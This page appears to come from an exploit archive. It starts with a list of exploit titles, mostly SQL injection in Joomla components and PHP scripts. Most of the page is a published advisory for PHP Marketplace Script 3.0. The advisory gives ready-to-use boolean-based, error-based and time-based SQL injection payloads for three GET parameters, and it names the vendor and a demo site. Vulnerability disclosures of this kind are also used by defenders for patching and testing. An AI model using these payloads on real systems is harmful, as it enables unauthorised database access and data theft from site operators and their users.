
20 new exploits Nokia N95-8 - browser (setAttributeNode) Method Crash Nokia N95-8 browser - 'setAttributeNode' Method Crash Got All Media 7.0.0.3 - (t00t) Remote Denial of Service Got All Media 7.0.0.3 - Remote Denial of Service GeoVision Digital Video Surveillance System - (geohttpserver) DT GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure pHNews alpha 1 - (templates_dir) Remote Code Execution pHNews alpha 1 - 'templates_dir' Parameter Remote Code Execution Bloggeruniverse 2.0 Beta - 'editcomments.php id' SQL Injection Den Dating 9.01 - 'searchmatch.php' SQL Injection InselPhoto 1.1 - (query) SQL Injection PHP Krazy Image Host Script 1.01 - 'viewer.php id' SQL Injection Bloggeruniverse 2.0 Beta - 'id' Parameter SQL Injection Den Dating 9.01 - 'txtlookgender' Parameter SQL Injection InselPhoto 1.1 - 'query' Parameter SQL Injection PHP Krazy Image Host Script 1.01 - 'id' Parameter SQL Injection Vlinks 1.1.6 - 'id' SQL Injection Vlinks 1.1.6 - 'id' Parameter SQL Injection CmsFaethon 2.2.0 - info.php item SQL Command Injection InselPhoto 1.1 - Persistent Cross-Site Scripting CmsFaethon 2.2.0 - 'item' Parameter SQL Injection InselPhoto 1.1 - Cross-Site Scripting SAS Hotel Management System - 'myhotel_info.asp' SQL Injection YACS CMS 8.11 - update_trailer.php Remote File Inclusion SAS Hotel Management System - 'id' Parameter SQL Injection YACS CMS 8.11 - 'update_trailer.php' Remote File Inclusion pHNews Alpha 1 - 'header.php mod' SQL Injection pHNews Alpha 1 - 'mod' Parameter SQL Injection Novaboard 1.0.1 - (message) Persistent Cross-Site Scripting Novaboard 1.0.1 - Cross-Site Scripting Joomla! Component JE Quiz - Blind SQL Injection Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection SAS Hotel Management System - user_login.asp SQL Injection SAS Hotel Management System - 'notfound' Parameter SQL Injection JE Messenger 1.0 - Arbitrary File Upload Joomla! Component JE Messenger 1.0 - Arbitrary File Upload Joomla! Component 'com_jeauto' - Local File Inclusion Joomla! Component JE Auto - Local File Inclusion vlinks 2.0.3 - 'site.php id Parameter' SQL Injection Vlinks 2.0.3 - 'id' Parameter SQL Injection Yacs CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion YACS CMS 10.5.27 - 'context[path_to_root]' Parameter Remote File Inclusion Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection PHP Marketplace Script - SQL Injection Joomla! Component JE Classify Ads 1.2 - 'pro_id' Parameter SQL Injection Joomla! Component JE Gallery 1.3 - 'photo_id' Parameter SQL Injection Joomla! Component JE Directory 1.7 - 'ditemid' Parameter SQL Injection Joomla! Component JE QuoteForm - 'Itemid' Parameter SQL Injection Joomla! Component JE Property Finder 1.6.3 - SQL Injection Joomla! Component JE Tour 2.0 - SQL Injection Joomla! Component JE Video Rate 1.0 - SQL Injection Joomla! Component JE auction 1.6 - 'eid' Parameter SQL Injection Joomla! Component JE Auto 1.5 - 'd_itemid' Parameter SQL Injection Joomla! Component JE Awd Song 1.8 - SQL Injection Joomla! Component Hbooking 1.9.9 - 'h_id' Parameter SQL Injection Joomla! Component JE Quiz 2.3 - SQL Injection Joomla! Component JE Grid Folio - 'id' Parameter SQL Injection Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' Parameter SQL Injection Joomla! Component JE Form Creator 1.8 - 'Itemid' Parameter SQL Injection Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' Parameter SQL Injection Joomla! Component JE Ticket System 1.2 - SQL Injection Joomla! Component JE Messanger - SQL Injection
60 lines
2.5 KiB
Text
Executable file
60 lines
2.5 KiB
Text
Executable file
# Exploit Title : PHP Marketplace Script - Multiple SQL Injection Vulnerabilities
|
|
# Author : Yunus YILDIRIM (Th3GundY)
|
|
# Team : CT-Zer0 (@CRYPTTECH) - https://www.crypttech.com
|
|
# Website : http://www.yunus.ninja
|
|
# Contact : yunusyildirim@protonmail.com
|
|
|
|
# Vendor Homepage : http://www.ecommercemix.com/
|
|
# Software Link : http://ecommercemix.com/php-marketplace-script/
|
|
# Vuln. Version : 3.0
|
|
# Demo : http://pleasureriver.com
|
|
|
|
|
|
# # # # DETAILS # # # #
|
|
|
|
SQL Injections :
|
|
|
|
# 1
|
|
http://localhost/shopby/all?q=gundy
|
|
Parameter: q (GET)
|
|
Type: boolean-based blind
|
|
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
|
|
Payload: q=LIEQ") OR NOT 5305=5305#
|
|
|
|
Type: error-based
|
|
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
|
Payload: q=LIEQ") AND (SELECT 7200 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(7200=7200,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("SRxl"="SRxl
|
|
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 OR time-based blind (comment)
|
|
Payload: q=LIEQ") OR SLEEP(5)#
|
|
|
|
# 2
|
|
http://localhost/shopby/all?p=31
|
|
Parameter: p (GET)
|
|
Type: boolean-based blind
|
|
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
|
|
Payload: p=31") OR NOT 6681=6681#
|
|
|
|
Type: error-based
|
|
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
|
Payload: p=31") AND (SELECT 4760 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SELECT (ELT(4760=4760,1))),0x7176766271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("eFds"="eFds
|
|
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind
|
|
Payload: p=31") AND SLEEP(5) AND ("kxQU"="kxQU
|
|
|
|
# 3
|
|
http://localhost/shopby/all?c=Turkey
|
|
Parameter: c (GET)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
Payload: c=Turkey' AND 9145=9145 AND 'tvKB'='tvKB
|
|
|
|
Type: error-based
|
|
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
|
Payload: c=Turkey' AND (SELECT 5928 FROM(SELECT COUNT(*),CONCAT(0x7176767071,(SELECT (ELT(5928=5928,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'APFD'='APFD
|
|
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind
|
|
Payload: c=Turkey' AND SLEEP(5) AND 'rmia'='rmia
|